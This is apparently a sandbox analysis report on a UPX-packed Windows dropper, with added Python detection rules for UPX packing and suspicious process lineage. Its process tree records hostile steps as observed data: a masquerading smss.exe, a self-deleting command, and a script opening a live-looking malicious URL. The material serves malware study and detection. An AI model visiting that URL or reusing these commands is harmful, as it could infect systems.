Analysis

  • max time kernel
    149s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240611-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    25/06/2024, 18:57

General

  • Target

    0f2a6040138eb52c32ea1c7a17454862_JaffaCakes118.exe

  • Size

    32KB

  • MD5

    0f2a6040138eb52c32ea1c7a17454862

  • SHA1

    debb1a7c0438271df202bc06555afbab532147b6

  • SHA256

    3d9f59b08a6af5df84c7bb8065e2f69f8f4370d60965fb207e58b96380f3b5bd

  • SHA512

    521523317ea028d0c1b95fb6020ac26f01ce8a177553975333864c6912340cbb4af4814a0638054a0882412958b18245e594e5ca35e7b23855d3314727847c0b

  • SSDEEP

    384:no+ihgqylX1WJQjglgOuyLz/DgjvtNUxMvim23JZn:o+ihgpW+87nspmYzUZn

Score
7/10
upx

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Executes dropped EXE 2 IoCs
  • UPX packed file 5 IoCs

    Detects executables packed with the open-source UPX packer or a modified UPX build.

  • Drops file in Program Files directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 39 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs
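
The "UPX packed file" signature above is, in the common case, a section-table check: stock UPX rewrites the PE so that it carries UPX0/UPX1 (sometimes UPX2) sections and leaves a "UPX!" packer-header magic in the image. The following is an added example of that check, not the sandbox's own detection code; the PE-shaped blobs it runs on are constructed inline (they are not loadable and are not the sample), and `build_fake_pe` exists only to exercise the header walk. The last case in the usage block shows the caveat a modified UPX introduces: once the sections are renamed and the magic stripped, this check goes quiet even though the file is still packed.

```python
"""UPX packer check on a PE section table.

Added example for the "UPX packed file" signature; it is not the sandbox's
own detection code, and the PE-shaped test input is constructed here, not
taken from the sample.
"""
import struct

# Section names stock UPX writes: UPX0 (empty, unpack destination), UPX1
# (compressed payload + decompression stub), sometimes UPX2 for resources.
UPX_SECTION_NAMES = {b"UPX0", b"UPX1", b"UPX2"}
UPX_MAGIC = b"UPX!"  # packer-header magic stock UPX leaves in the image


def pe_section_names(data: bytes) -> list:
    """Return the names in a PE image's section table.

    Walk: DOS header -> e_lfanew -> "PE\\0\\0" -> IMAGE_FILE_HEADER ->
    IMAGE_OPTIONAL_HEADER (skipped via SizeOfOptionalHeader) -> section table.
    Raises ValueError for anything that is not PE-shaped.
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4  # IMAGE_FILE_HEADER, 20 bytes
    (num_sections,) = struct.unpack_from("<H", data, coff + 2)
    (size_of_optional,) = struct.unpack_from("<H", data, coff + 16)
    table = coff + 20 + size_of_optional
    names = []
    for i in range(num_sections):
        off = table + i * 40  # IMAGE_SECTION_HEADER is 40 bytes; Name is the first 8
        if off + 40 > len(data):
            raise ValueError("truncated section table")
        names.append(data[off:off + 8].rstrip(b"\0"))
    return names


def is_upx_packed(data: bytes) -> bool:
    """True when the section names or the UPX! magic point at stock or lightly
    modified UPX. A rebuilt UPX that renames its sections and strips the magic
    is missed; that is the limit of this check."""
    names = set(pe_section_names(data))
    return bool(names & UPX_SECTION_NAMES) or UPX_MAGIC in data


def build_fake_pe(section_names, trailer: bytes = b"") -> bytes:
    """Constructed test input: a minimal PE-shaped blob with the given section
    names. It is not loadable; it only exercises the header walk above."""
    e_lfanew = 0x40
    dos_header = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    size_of_optional = 0xE0  # PE32 optional header
    file_header = struct.pack(
        "<HHIIIHH",
        0x14C,                 # Machine = i386
        len(section_names),    # NumberOfSections
        0, 0, 0,               # TimeDateStamp, PointerToSymbolTable, NumberOfSymbols
        size_of_optional,      # SizeOfOptionalHeader
        0x102,                 # Characteristics = EXECUTABLE_IMAGE | 32BIT_MACHINE
    )
    optional_header = b"\0" * size_of_optional
    section_table = b"".join(n.ljust(8, b"\0") + b"\0" * 32 for n in section_names)
    return dos_header + b"PE\0\0" + file_header + optional_header + section_table + trailer


if __name__ == "__main__":
    packed = build_fake_pe([b"UPX0", b"UPX1", b".rsrc"])
    plain = build_fake_pe([b".text", b".data", b".rsrc"])
    renamed = build_fake_pe([b".text", b".data"], trailer=UPX_MAGIC)  # sections renamed, magic left
    stripped = build_fake_pe([b".text", b".data"])                    # renamed and magic stripped
    print(pe_section_names(packed))
    print(is_upx_packed(packed), is_upx_packed(plain), is_upx_packed(renamed), is_upx_packed(stripped))
```

Run it against a real file with `is_upx_packed(open(path, "rb").read())`. A hit on the section names is a strong signal; a miss only says the packer is not stock UPX, so treat an entropy check or a sandbox signature like the one above as the fallback.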

Processes

  • C:\Users\Admin\AppData\Local\Temp\0f2a6040138eb52c32ea1c7a17454862_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\0f2a6040138eb52c32ea1c7a17454862_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4740
    • C:\uy.exe
      "C:\uy.exe"
      2⤵
      • Executes dropped EXE
      • Drops file in Program Files directory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3964
      • C:\Program Files\smss.exe
        "C:\Program Files\smss.exe"
        3⤵
        • Executes dropped EXE
        PID:4372
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c del C:\uy.exe > nul
        3⤵
          PID:5064
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\1.vbs"
        2⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:3432
        • C:\Program Files\Internet Explorer\iexplore.exe
          "C:\Program Files\Internet Explorer\iexplore.exe" http://c8.uk3.in:5754/kx/xjjj.htm
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:3264
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3264 CREDAT:17410 /prefetch:2
            4⤵
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:2404
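
The tree above is a compact dropper chain: the sample writes and runs C:\uy.exe from the volume root; uy.exe writes C:\Program Files\smss.exe (the name of the Windows Session Manager, whose real copy lives only under System32) and then removes itself with cmd.exe /c del; in parallel the sample runs C:\1.vbs through WScript.exe, which opens Internet Explorer on http://c8.uk3.in:5754/kx/xjjj.htm, a non-web port. Each of those steps is a lineage rule a detection engineer can write once and reuse. The block below is an added example of those four rules over process-creation events, not the sandbox's own logic; the events are reconstructed from the report's process tree as Sysmon event-ID-1 style records (the field names are mine, and the top-level parent PID is not shown in the report, so it is set to 0).

```python
"""Behavioural rules over process-creation events.

Added example, not the sandbox's own logic. EVENTS is reconstructed from the
report's process tree (constructed input in Sysmon event-ID-1 style; the
field names are mine, and the sample's own parent PID is unknown, so 0).
"""
import re
from urllib.parse import urlparse

EVENTS = [
    {"pid": 4740, "ppid": 0,
     "image": r"C:\Users\Admin\AppData\Local\Temp\0f2a6040138eb52c32ea1c7a17454862_JaffaCakes118.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\0f2a6040138eb52c32ea1c7a17454862_JaffaCakes118.exe"'},
    {"pid": 3964, "ppid": 4740, "image": r"C:\uy.exe", "cmdline": r'"C:\uy.exe"'},
    {"pid": 4372, "ppid": 3964, "image": r"C:\Program Files\smss.exe",
     "cmdline": r'"C:\Program Files\smss.exe"'},
    {"pid": 5064, "ppid": 3964, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"C:\Windows\system32\cmd.exe /c del C:\uy.exe > nul"},
    {"pid": 3432, "ppid": 4740, "image": r"C:\Windows\SysWOW64\WScript.exe",
     "cmdline": r'"C:\Windows\System32\WScript.exe" "C:\1.vbs"'},
    {"pid": 3264, "ppid": 3432, "image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "cmdline": r'"C:\Program Files\Internet Explorer\iexplore.exe" http://c8.uk3.in:5754/kx/xjjj.htm'},
    {"pid": 2404, "ppid": 3264, "image": r"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE",
     "cmdline": r'"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3264 CREDAT:17410 /prefetch:2'},
]

# Core Windows binaries that only legitimately run from the system directories.
SYSTEM_BINARIES = {"smss.exe", "csrss.exe", "wininit.exe", "winlogon.exe",
                   "services.exe", "lsass.exe", "svchost.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
BROWSERS = {"iexplore.exe", "msedge.exe", "chrome.exe", "firefox.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def analyze(events):
    """Return (rule, pid, detail) findings for the four patterns in this tree."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        image, cmd = e["image"], e["cmdline"]
        name, low = basename(image), image.lower()
        parent = by_pid.get(e["ppid"])

        # 1. A core system binary name running outside System32/SysWOW64
        #    (the real smss.exe never lives in Program Files).
        if name in SYSTEM_BINARIES and not low.startswith(SYSTEM_DIRS):
            findings.append(("system_binary_masquerade", e["pid"], image))

        # 2. An executable started straight from the volume root (C:\uy.exe).
        if re.fullmatch(r"[a-z]:\\[^\\]+\.exe", low):
            findings.append(("exec_from_volume_root", e["pid"], image))

        # 3. cmd.exe /c del <parent's own image>: the dropper removing itself.
        if name == "cmd.exe" and parent is not None:
            m = re.search(r"/c\s+del\s+(\S+)", cmd, re.IGNORECASE)
            if m and m.group(1).lower() == parent["image"].lower():
                findings.append(("self_delete_via_cmd", e["pid"], parent["image"]))

        # 4. A script host launching a browser at a URL on a non-web port.
        if parent is not None and basename(parent["image"]) in SCRIPT_HOSTS and name in BROWSERS:
            for url in re.findall(r"https?://\S+", cmd):
                port = urlparse(url).port
                if port not in (None, 80, 443):
                    findings.append(("script_launched_browser_nonstandard_port", e["pid"], url))
    return findings


if __name__ == "__main__":
    for rule, pid, detail in analyze(EVENTS):
        print(f"{rule:45} pid={pid} {detail}")
```

On the report's tree this yields exactly four findings, one per stage: uy.exe from the volume root (PID 3964), the smss.exe masquerade in Program Files (PID 4372), the self-delete (PID 5064) and the WScript-driven browser launch to port 5754 (PID 3264); the IE child process (PID 2404) is clean under these rules because its parent is the browser, not the script host. Rule 1 is the one to ship first: a file named smss.exe under Program Files has no benign explanation, and the write itself needs an elevated token, which is consistent with the "Suspicious use of AdjustPrivilegeToken" flag on uy.exe.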

    Network

          MITRE ATT&CK Enterprise v15


          Downloads

          • C:\1.vbs

            Filesize

            81B

            MD5

            59e10676cbd207d7915de41d9f60cb40

            SHA1

            e55c4d85e6bcaa1f4bf4cf584da62756247cde4b

            SHA256

            1a7a6565d8d6ae42941c9220ce62ad49b610d0768adec8c533ec265aa1f54804

            SHA512

            467622a23f640e1180c29d8f589e2bcae16005435407a48ec6cb23211de6230be8429096f44bbcb8a492a84d3434d32ed334d04d8899915ef5b48f5f82626da8

          • C:\Program Files\smss.exe

            Filesize

            15.7MB

            MD5

            0b4627e947d465edfd3e686c4fc2d116

            SHA1

            75fee08a75667ce543b167b106b21b024ac43d14

            SHA256

            9af41a5836c04423914cbcacba202b09adf1c223cf5d9c61b390426df967cb10

            SHA512

            bb6820ee04e6bf31f17edf256c8d8ac9e6901abff0aa3db2fabeda79ad4e5f2daced982e69392bdc398cd8cf7bf32cfcb01a6bbab21384bf569feb8bcfc0984d

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

            Filesize

            471B

            MD5

            b9b9f42ce6d2b20bf169d05480d239d4

            SHA1

            32b094cc2ff79f07fcd68d585846b919bc350e4d

            SHA256

            4d16bb8c9a34d4de9d39bb5f0e87095617b5ad551112db17b38b6cb752fbdae4

            SHA512

            36b45c544439c6b1fab4c2fa58712475a65ad467e3da61086c4a953d6587d35f5c6ae7de740863295ae0d3534cbf67d0bed6843d95b6786b50431bfeebcf1010

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

            Filesize

            404B

            MD5

            1332d982752e52da0bc750c924c53714

            SHA1

            194afefb422afb91ac8dcd76d77da4a5789c5710

            SHA256

            7fbc275e4f3b4809fe9c9ceba02bc3913f6443cde7ed760c58c258dae6b56edc

            SHA512

            bb15194cfdb767d0be30ae5b16cdfcca15566fdb9a9e4bf57577b5af401b5d68079bb702d28e13be22ba219e71acceb0874645374d31237ada252bdc43b5ced9

          • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\VersionManager\verB2B6.tmp

            Filesize

            15KB

            MD5

            1a545d0052b581fbb2ab4c52133846bc

            SHA1

            62f3266a9b9925cd6d98658b92adec673cbe3dd3

            SHA256

            557472aeaebf4c1c800b9df14c190f66d62cbabb011300dbedde2dcddd27a6c1

            SHA512

            bd326d111589d87cd6d019378ec725ac9ac7ad4c36f22453941f7d52f90b747ede4783a83dfff6cae1b3bb46690ad49cffa77f2afda019b22863ac485b406e8d

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\E9YVC3IR\suggestions[1].en-US

            Filesize

            17KB

            MD5

            5a34cb996293fde2cb7a4ac89587393a

            SHA1

            3c96c993500690d1a77873cd62bc639b3a10653f

            SHA256

            c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

            SHA512

            e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

          • C:\uy.exe

            Filesize

            8KB

            MD5

            1218963b79998af07ee81223fdbbb62f

            SHA1

            c1fd5faf23073495137e5d2ffbd54f50fbcbccd6

            SHA256

            faae720cec9a0637b6cf702b2a99161c2a128856475dfacb3f02b5b80ddc01d1

            SHA512

            212106360434b39adc857891121cc8efc8951b2874147471b910c36d156fb4d9acac2af77606eb2688670d294bcf4b19677c3a431867fb370951cc893879d637

          • memory/3964-16-0x0000000000400000-0x000000000040B000-memory.dmp

            Filesize

            44KB

          • memory/3964-26-0x0000000000400000-0x000000000040B000-memory.dmp

            Filesize

            44KB

          • memory/4372-27-0x0000000000400000-0x000000000040B000-memory.dmp

            Filesize

            44KB